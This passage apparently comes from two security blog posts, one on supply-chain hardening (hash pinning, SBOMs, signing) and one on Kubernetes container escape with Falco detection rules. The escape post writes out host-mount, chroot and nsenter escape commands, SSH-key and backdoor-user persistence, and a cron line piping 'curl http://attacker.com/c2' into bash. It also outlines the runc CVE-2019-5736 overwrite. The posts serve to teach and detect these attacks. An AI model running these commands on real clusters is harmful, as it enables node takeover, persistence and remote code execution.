ss -tnp | grep -E "(ESTAB|SYN-SENT)"
# Any connection to an IP outside your artifact registry and SCM = investigate

# Compare artifact hashes across two builds of the same commit
# (tests build reproducibility)
docker pull ghcr.io/your-org/your-image@sha256:<first-build-digest>
docker pull ghcr.io/your-org/your-image@sha256:<second-build-digest>
# If the digests differ for the same source commit, investigate
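
The third signal, dependencies that appear without a reviewed change, can be approximated by diffing the SBOM of the current build against the SBOM of the last released build. A minimal sketch, assuming both SBOMs are CycloneDX JSON already loaded as dicts with a top-level components array; sbom_drift is a hypothetical name, and tying each reported change back to a pull request is left to the surrounding process.

```python
def versions_by_name(sbom: dict) -> dict[str, set[str]]:
    """Collect the set of versions seen for each component name."""
    versions: dict[str, set[str]] = {}
    for component in sbom.get("components", []):
        versions.setdefault(component.get("name", ""), set()).add(component.get("version", ""))
    return versions


def sbom_drift(previous: dict, current: dict) -> dict[str, list[str]]:
    """List components that are new in the current build or changed version."""
    before = versions_by_name(previous)
    after = versions_by_name(current)

    added = sorted(
        f"{name}@{version}"
        for name in after.keys() - before.keys()
        for version in sorted(after[name])
    )
    changed = sorted(
        f"{name}: {', '.join(sorted(before[name]))} -> {', '.join(sorted(after[name]))}"
        for name in after.keys() & before.keys()
        if after[name] != before[name]
    )
    return {"added": added, "version_changed": changed}
```

An empty result for a build whose source diff touched no dependency files is the expected case; anything else deserves a look.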

Purple Phase: Structural Fixes

1. Pin Dependencies with Hashes — Not Just Versions

Version pinning (requests==2.31.0) pins the version number. The package maintainer can yank and re-upload that version with different content on some registries. Hash pinning locks the exact file bytes:

# requirements.txt — hash-pinned
requests==2.31.0 \
    --hash=sha256:58cd2187423839e4e2d07f6f16c9cd680e74d6066237a4e1e88f06fc4a3e2e56 \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1
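# Two hashes because the package ships both a wheel and a source tarball
# pip verifies the downloaded file matches one of these hashes before installing
# Treat the hash values above as illustrative; generate real ones with
# pip-compile rather than copying them from an article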

# Generate hash-pinned requirements from a working environment
pip-compile --generate-hashes requirements.in --output-file requirements.txt
# pip-compile resolves the full dependency tree and writes pinned+hashed output
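
What hash pinning buys you is easy to see when the check is written out by hand. The following sketch mirrors the idea behind pip's hash-checking mode, not its implementation: a downloaded file is accepted only if its SHA-256 digest is in the pinned set. The function name is an assumption for illustration.

```python
import hashlib
from pathlib import Path


def matches_pinned_hash(path: Path, allowed_sha256: set[str]) -> bool:
    """Return True only if the file's SHA-256 digest is one of the pinned values."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        # Read in chunks so large wheels do not have to fit in memory.
        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
            digest.update(chunk)
    return digest.hexdigest() in allowed_sha256
```

A re-uploaded file with the same name and version but different bytes fails this check, which is exactly the case that version pinning alone lets through.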

For containers, pin base images by digest, not by tag:

# Vulnerable: mutable tag
FROM python:3.11-slim

# Secure: pinned digest
FROM python:3.11-slim@sha256:6a37af1bde8be89040f70b9e93f2f61b5f14e99d7e49f9ea3dc7ded2e1c82f7b
# The digest is immutable — this exact image layer will always be fetched,
# regardless of what the 3.11-slim tag points to in the future

2. Private Artifact Registry — No Direct PyPI or npm in Production CI

A private registry (Artifactory, Nexus, AWS CodeArtifact, Google Artifact Registry) proxies upstream registries and caches approved packages. Benefits:

Dependency confusion protection: your CI resolves mycompany-utils from your private registry first, never from public PyPI
Availability independence: a PyPI outage does not break your builds
Audit trail: every package version pulled in every build is logged
Policy enforcement: you can block packages with unacceptable licenses or CVE scores

# Configure pip to use a private registry proxy exclusively
# In ci/pip.conf or as an environment variable
export PIP_INDEX_URL="https://your-artifactory.company.com/artifactory/api/pypi/pypi-virtual/simple/"
# Do not set PIP_TRUSTED_HOST for an HTTPS registry: it turns off
# certificate verification for that host
# No direct PyPI access: all packages go through your registry proxy

# For npm: configure registry in .npmrc
echo "registry=https://your-artifactory.company.com/artifactory/api/npm/npm-virtual/" > .npmrc
echo "always-auth=true" >> .npmrc

3. Reproducible Builds — Same Input Produces Same Output

Reproducible builds allow independent verification: a third party can take the same source and build environment and produce a byte-for-byte identical artifact. If the published artifact does not match, something changed between source and distribution.

This is exactly how the XZ tarball compromise would have been caught earlier with proper tooling: the release tarball did not match what would be produced by checking out the git tag and running the build.

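# For Go: builds are reproducible when toolchain, flags, and source match
# -trimpath (Go 1.13+) keeps local filesystem paths out of the binary
# Verify by building twice and comparing
# (./cmd/your-app is a placeholder for a single main package)
go build -trimpath -o binary-1 ./cmd/your-app
go build -trimpath -o binary-2 ./cmd/your-app
sha256sum binary-1 binary-2
# Identical hashes = reproducible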

# For containers with BuildKit: use --no-cache and compare digests
DOCKER_BUILDKIT=1 docker build --no-cache -t test-1 .
DOCKER_BUILDKIT=1 docker build --no-cache -t test-2 .
docker inspect test-1 test-2 | jq '.[].Id'
# Identical IDs = reproducible build environment

# SOURCE_DATE_EPOCH forces reproducible timestamps (common reproducibility blocker)
export SOURCE_DATE_EPOCH=$(git log -1 --format=%ct)
make  # or whatever your build command is
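
Timestamps are only one source of non-determinism; file ordering and ownership metadata are others. The sketch below packs a directory into a tar archive with all three pinned, so that two runs over the same content give the same digest. It is an illustration of the technique under simple assumptions (regular files only, fixed 0644 mode), and deterministic_tar is a hypothetical helper, not a feature of any build tool mentioned above.

```python
import hashlib
import io
import tarfile
from pathlib import Path


def deterministic_tar(src: Path, epoch: int) -> bytes:
    """Pack regular files under src with sorted order and fixed metadata."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w", format=tarfile.GNU_FORMAT) as tar:
        for path in sorted(p for p in src.rglob("*") if p.is_file()):
            data = path.read_bytes()
            info = tarfile.TarInfo(name=path.relative_to(src).as_posix())
            info.size = len(data)
            info.mtime = epoch   # e.g. int(os.environ["SOURCE_DATE_EPOCH"])
            info.mode = 0o644    # ignore local permission differences
            # uid, gid, uname, gname keep TarInfo's neutral defaults (0 and "")
            tar.addfile(info, io.BytesIO(data))
    return buffer.getvalue()


def archive_digest(src: Path, epoch: int) -> str:
    """SHA-256 of the deterministic archive, suitable for comparing two builds."""
    return hashlib.sha256(deterministic_tar(src, epoch)).hexdigest()
```

The archive is left uncompressed on purpose: gzip writes its own timestamp into the header, which would reintroduce the problem this sketch removes.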

4. Separate Build and Release Environments

SolarWinds built and signed in the same compromised environment. The build environment had signing keys. An attacker who owns the build host owns the signing operation.

INSECURE:                           SECURE:

Build host ──▶ compile              Build host ──▶ compile
           ──▶ sign artifact                   ──▶ output unsigned artifact
           ──▶ publish                                    │
                                                          ▼
                                    Separate signing host (air-gapped or HSM)
                                                    ──▶ verify artifact hash
                                                    ──▶ sign with HSM key
                                                    ──▶ publish signed artifact

In practice: signing keys should live in a hardware security module (HSM) or KMS, not on the build host. The build produces an artifact hash; the signing service receives only the hash, not the full artifact, and signs it with the HSM-protected key. Build host compromise does not yield the signing key.
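
The separation can be sketched in a few lines. In this illustration the build side computes a digest and the signing side only ever receives that digest. HMAC from the standard library is used purely as a stand-in for an HSM- or KMS-backed asymmetric signature, and the SigningService class is hypothetical; the point is the interface boundary, not the cryptography.

```python
import hashlib
import hmac
import re


def artifact_digest(artifact: bytes) -> str:
    """Build side: reduce the artifact to a SHA-256 hex digest."""
    return hashlib.sha256(artifact).hexdigest()


class SigningService:
    """Signing side: holds the key and accepts digests only, never artifacts."""

    def __init__(self, key: bytes):
        self._key = key  # in a real setup this never leaves the HSM/KMS

    def sign_digest(self, digest_hex: str) -> str:
        # Refuse anything that is not a well-formed SHA-256 digest.
        if not re.fullmatch(r"[0-9a-f]{64}", digest_hex):
            raise ValueError("expected a lowercase SHA-256 hex digest")
        return hmac.new(self._key, bytes.fromhex(digest_hex), hashlib.sha256).hexdigest()

    def verify(self, digest_hex: str, signature: str) -> bool:
        return hmac.compare_digest(self.sign_digest(digest_hex), signature)
```

With this split, compromising the build host lets an attacker request signatures while they hold access, which is still bad and still needs logging and approval controls, but it does not hand them the key for later use.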

5. SBOM in Every Release — Non-Negotiable

If you cannot enumerate what is in your artifact, you cannot answer supply chain compromise questions. When CVE-2024-3094 dropped, every organization with an SBOM could query it in minutes. Organizations without one had to manually inspect every container image and every deployed system.

# Attach SBOM to a container image as an attestation (stored in registry)
syft ghcr.io/your-org/your-image:latest -o cyclonedx-json | \
  cosign attest \
    --predicate /dev/stdin \
    --type cyclonedx \
    ghcr.io/your-org/your-image:latest
# The SBOM is now stored alongside the image and signed with OIDC credentials

# Later: retrieve and search the SBOM
# (pin the identity pattern to your own repo; ".*" accepts any signer)
cosign verify-attestation \
  --type cyclonedx \
  --certificate-identity-regexp="^https://github.com/your-org/your-repo/" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest | \
  jq -r '.payload | @base64d | fromjson | .predicate.components[] |
    select(.name == "xz-libs") | {name, version}'

⚠ Production Gotchas

Hash pinning breaks automated dependency update workflows. When you pin with hashes, tools like Dependabot and Renovate still open PRs, but they must also update the hashes. This works — both tools support hash pinning — but you must configure them explicitly. Without hash update support in your automation, developers will remove pinning to unblock themselves.

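Hermetic builds are a pipeline restructure, and most teams are not ready. Hermetic means the build process makes no network calls during compilation (all dependencies fetched in a prior, logged step). SLSA v1.0 Level 3 itself asks for an isolated, hardened build platform rather than hermeticity (hermetic builds were a Level 4 requirement in SLSA v0.1), but the two are usually pursued together. Most existing CI pipelines fetch dependencies during the build step, so getting there requires restructuring your pipeline into explicit fetch → build phases. Start at Level 2 (hosted, signed provenance) and treat Level 3 with hermetic builds as a 6-month target.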

SBOMs without a query workflow are paperwork. Generating an SBOM with syft and storing it somewhere is the easy part. The useful part is having a process to query all SBOMs across your fleet within minutes of a new CVE. Without that query infrastructure, you have documentation, not detection capability.
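
As a rough picture of what a query workflow means at its smallest, the sketch below scans a directory of CycloneDX JSON files and reports which ones contain an affected xz build. The directory layout (one SBOM file per image), the package-name set, and the helper names are assumptions for illustration. The version parsing handles the common RPM and Debian shapes, including Debian's "+really" rollback convention, and is not a general version parser.

```python
import json
import re
from pathlib import Path

AFFECTED_XZ = {"5.6.0", "5.6.1"}
XZ_PACKAGES = {"xz", "xz-libs", "xz-utils", "liblzma", "liblzma5"}


def upstream_version(version: str) -> str:
    """Reduce a distro package version to the upstream version it actually ships."""
    version = version.split(":", 1)[-1]        # drop an epoch such as "1:"
    if "+really" in version:                   # e.g. 5.6.1+really5.4.5-1 ships 5.4.5
        version = version.split("+really", 1)[1]
    return re.split(r"[-+~]", version, maxsplit=1)[0]


def affected_images(sbom_dir: Path) -> dict[str, list[str]]:
    """Map each SBOM file name to the affected xz components it lists."""
    hits: dict[str, list[str]] = {}
    for sbom_path in sorted(sbom_dir.glob("*.json")):
        sbom = json.loads(sbom_path.read_text())
        for component in sbom.get("components", []):
            name = component.get("name", "")
            version = component.get("version", "")
            if name in XZ_PACKAGES and upstream_version(version) in AFFECTED_XZ:
                hits.setdefault(sbom_path.name, []).append(f"{name}@{version}")
    return hits
```

At fleet scale the same question is usually answered by a database or a dedicated SBOM platform; what matters is that the question can be asked in one place and answered in minutes.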

An unsigned image must fail closed at admission, not slip through. If an image has no cosign signature, cosign verify returns an error, which is correct. But in a Kubernetes admission webhook that enforces signing (e.g., Kyverno, OPA/Gatekeeper), an unsigned image must be an explicit policy violation, not a webhook error that gets bypassed by a fail-open configuration. Always run admission webhooks in fail-closed mode.

Tarball vs git diff requires automation. Manually diffing every release tarball against its git tag is not sustainable. The XZ compromise would have been caught earlier if distributions had automated this check as part of their packaging workflow. Tools like diffoscope can automate the comparison; integrating it into your package intake process is the structural fix.

Quick Reference

Attack Vector	Detection Signal	Fix
Build system compromise (SolarWinds)	Artifact hash drift; unexpected egress during build; tarball ≠ git diff	SLSA Level 3 isolated builds with hermetic build steps; separate signing environment
Maintainer social engineering (XZ)	Tarball ≠ git diff; SBOM shows unexpected dependency; anomalous sshd syscalls	Reproducible builds; tarball verification in package intake
Dependency confusion	Package resolves from public registry instead of private	Private artifact registry with scoped package names
Typosquatting	`pip-audit` / `npm audit signatures` findings	Private registry; automated dependency scanning in CI
Unsigned container image	`cosign verify` fails; no attestation in registry	Sigstore/cosign in CI; fail-closed admission webhook

Key Takeaways

Supply chain attacks bypass perimeter security entirely — the attacker delivers malware through a channel you already trust, signed by a certificate you already trust, via an update mechanism you already approve
SolarWinds was caught by a downstream victim (FireEye), not by SolarWinds’ own security team — the build environment had no integrity monitoring that could detect modification of compiled artifacts
XZ Utils was caught by an engineer noticing a 500ms latency anomaly during unrelated performance work, not by any security tooling — this was within days of the backdoor shipping in multiple stable Linux distribution releases
The detection pipeline has five layers, each catching a different attack class: hash pinning (dependency hijacking), SBOM (enumeration and CVE correlation), Sigstore signing (artifact integrity), SLSA provenance (build traceability), tarball vs git diff (source/distribution divergence)
Start with what you can implement this week: pip-audit or npm audit signatures in CI, syft SBOM generation on every image build, and cosign signing for any container image that reaches production — these three steps cover the most common attack classes with minimal pipeline restructuring

What’s Next

SolarWinds showed that attackers can own your build system and reach your customers’ production networks through a single trusted update. Once they have a foothold in a cloud account — whether via a compromised build artifact or any other initial access vector — the next move is lateral: cross-account IAM role chaining to escalate from a single compromised resource to your entire cloud organization. EP10 covers what that lateral movement looks like, how to detect trust relationship abuse in CloudTrail, and how to structure cross-account access so that a single compromise cannot pivot to every account you own.


Kubernetes Container Escape: Attack Paths and eBPF Detection

June 26, 2026 by Vamshi Krishna Santhapuri

Reading Time: 17 minutes

TL;DR

Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host, and three commands can produce a root shell on the node
The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, capabilities, and seccomp. --privileged grants every capability, disables the default seccomp and AppArmor profiles, and exposes host devices, so what remains of the boundary can be undone from inside the container
Three primary escape paths: privileged container with host device access, hostPID + nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec
Detection requires kernel-level visibility: Falco fires on exec inside a privileged container; Tetragon traces nsenter and mount syscalls at the kernel hook rather than relying on a process-name check that can be evaded
The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level: policy that rejects --privileged, hostPID, hostNetwork, and hostPath mounts before a pod is ever scheduled
Network policy as a secondary layer: blocking application pods from reaching the Kubernetes API server limits lateral movement toward the cluster control plane from a compromised pod. Traffic from a process that has already reached the node's host network needs node-level controls as well

OWASP Mapping: A04 Insecure Design — --privileged placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──▶ exploit ──▶ shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘

Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node’s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with --privileged, you remove the boundary.

The Incident: --privileged “Just for Debugging”

A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds privileged: true to the container’s securityContext to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The privileged flag stays in the manifest when staging gets promoted to production.

Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.

Inside the container, three commands:

mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.

The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.

This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.

Why the Kernel Doesn’t Know About Kubernetes

Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.

Kernel isolation comes from:

Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, and other privileged syscalls

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor

--privileged weakens several of these layers at once. It grants every capability, disables the default seccomp filter, disables AppArmor confinement, and exposes the host’s devices to the container. The namespaces still exist, but a privileged container is effectively a process running on the host with a different filesystem view, and with mount you can fix even the filesystem view.

Red Phase: The Three Escape Paths

Path 1: --privileged Container

A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.

Check if the current container is privileged:

# CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin: present means the container is privileged or was granted CAP_SYS_ADMIN explicitly
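
The same check can be scripted for images that do not ship capsh. This is a minimal sketch, assuming the standard Linux capability numbering (CAP_SYS_ADMIN is bit 21); the function names are illustrative and not part of any tool mentioned in this post.

```python
from __future__ import annotations

# Bit positions from linux/capability.h (only the ones relevant to escape paths).
CAP_BITS = {
    "cap_sys_chroot": 18,
    "cap_sys_ptrace": 19,
    "cap_sys_admin": 21,
}


def parse_cap_eff(status_text: str) -> int:
    """Return the CapEff value from the text of a /proc/<pid>/status file."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split(":", 1)[1].strip(), 16)
    raise ValueError("no CapEff line found")


def held_caps(cap_eff: int) -> list[str]:
    """List which of the capabilities in CAP_BITS are set in the bitmask."""
    return [name for name, bit in CAP_BITS.items() if cap_eff & (1 << bit)]
```

Inside a container, `held_caps(parse_cap_eff(open("/proc/1/status").read()))` gives the result for PID 1. A list that includes cap_sys_admin is the signal to investigate.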

Full escape sequence:

# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep ' / '
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node's bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/

What persistence looks like from node root:

# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
  >> /mnt/host/etc/cron.d/maintenance

Path 2: hostPID / hostNetwork Escape

hostPID: true is a less obvious escape path than --privileged but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host’s full namespace set.

With hostPID enabled, and with enough privilege to call setns() (CAP_SYS_ADMIN, which a privileged container has), nsenter produces a host root shell without mounting anything:

# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep " / "  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)

nsenter — a Linux utility that enters the namespaces of an existing process. With -t 1 it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.

hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.

Path 3: runc CVE Escape (CVE-2019-5736)

CVE-2019-5736 is a different attack class: it does not require a misconfiguration in the pod spec. It exploits the way the runc container runtime exposes its own host binary through /proc/self/exe when it enters a container.

The mechanism:

1. Attacker controls a container image, or has root inside a running container
2. A binary the operator is likely to exec (for example /bin/bash) is replaced with a script whose interpreter line is #!/proc/self/exe
3. Operator runs: kubectl exec -it <pod> -- /bin/bash
4. runc executes that script inside the container; /proc/self/exe resolves to the host's runc binary, so runc re-executes itself
5. Attacker's process in the container opens /proc/<runc-pid>/exe and obtains a handle to the host runc binary
6. Timing window: once the runc process exits, the attacker reopens the handle for writing and overwrites the runc binary on the host
7. On next runc exec, malicious binary runs as root on the host

The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:

# Simplified bpftrace sketch (read-only tracing, safe to run on a test node):
# This shows the pattern; Tetragon implements it as a continuous policy

bpftrace -e '
tracepoint:syscalls:sys_enter_write {
  // Prints every write() call with its fd number. It does not resolve the fd
  // to a path, so on its own it cannot single out writes to the runc binary.
  // In production: Tetragon handles this at the LSM hook level
  printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20

Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the vulnerability. The practical implication: patching the node is the only complete fix for runc-class CVEs. Pod-level policy cannot remove a vulnerability in the container runtime itself, although running containers as non-root narrows this particular exploit, which needs root inside the container.

Safe Simulation: Audit Your Cluster Before an Attacker Does

These commands are read-only and safe to run against any cluster you have kubectl access to:

# Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(" / ")' | \
  sort -u

# Find pods with hostPID or hostNetwork
# ("else empty" drops the unset flag, so no trailing separators need filtering)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     (if .spec.hostPID then "hostPID" else empty end),
     (if .spec.hostNetwork then "hostNetwork" else empty end)] |
    join(" / ")' | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + "→" + .hostPath.path)] |
    join(" / ")' | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r '.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join("/")' | \
  sort -u
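
When the jq one-liners get hard to maintain, the same inventory can be produced from a single `kubectl get pods -A -o json` dump. The sketch below is one possible shape, not an established tool: the function names are hypothetical, and unlike the queries above it also checks initContainers.

```python
from __future__ import annotations


def escape_preconditions(pod: dict) -> list[str]:
    """Return the escape-relevant settings found in one pod object."""
    spec = pod.get("spec") or {}
    findings = []
    if spec.get("hostPID"):
        findings.append("hostPID")
    if spec.get("hostNetwork"):
        findings.append("hostNetwork")
    containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
    for container in containers:
        if (container.get("securityContext") or {}).get("privileged"):
            findings.append(f"privileged:{container.get('name', '?')}")
    for volume in spec.get("volumes") or []:
        if volume.get("hostPath"):
            findings.append(f"hostPath:{volume['hostPath'].get('path', '?')}")
    return findings


def audit(pod_list: dict) -> dict[str, list[str]]:
    """Map "namespace/name" to findings for every pod with at least one finding."""
    report = {}
    for pod in pod_list.get("items") or []:
        findings = escape_preconditions(pod)
        if findings:
            meta = pod.get("metadata") or {}
            report[f"{meta.get('namespace')}/{meta.get('name')}"] = findings
    return report
```

Feeding it `json.load(sys.stdin)` from the kubectl dump yields one dictionary per cluster snapshot, which is easy to diff between exercises.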

Blue Phase: eBPF Detection

Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.

Falco: Privileged Container and Mount Detection

# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: >
    A process was executed in a container running with --privileged,
    which has no capability or seccomp restrictions. The condition
    matches every execve in such a container, not only its start.
  condition: >
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: >
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
  desc: >
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: >
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: >
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.dev
     mount_target=%evt.arg.dir
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: >
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: >
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: >
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: >
    A process inside a container is reading /proc entries for PIDs
    that don't belong to it — indicates hostPID=true and enumeration.
  condition: >
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: >
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]
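
For the exercise debrief it helps to know which of these rules actually fired. The following is a rough sketch, assuming Falco runs with `json_output: true` and writes one JSON object per line containing `rule` and `priority` keys; the helper names are made up for illustration.

```python
from __future__ import annotations

import json
from collections import Counter
from typing import Iterable


def tally_alerts(lines: Iterable[str]) -> Counter:
    """Count alerts per (rule, priority) from Falco JSON output lines."""
    counts: Counter = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip non-JSON lines such as startup messages
        if not isinstance(event, dict):
            continue
        counts[(event.get("rule", "unknown"), event.get("priority", "unknown"))] += 1
    return counts


def silent_rules(expected_rules: Iterable[str], counts: Counter) -> list[str]:
    """Rules that were expected to fire during the exercise but did not."""
    fired = {rule for rule, _priority in counts}
    return sorted(set(expected_rules) - fired)
```

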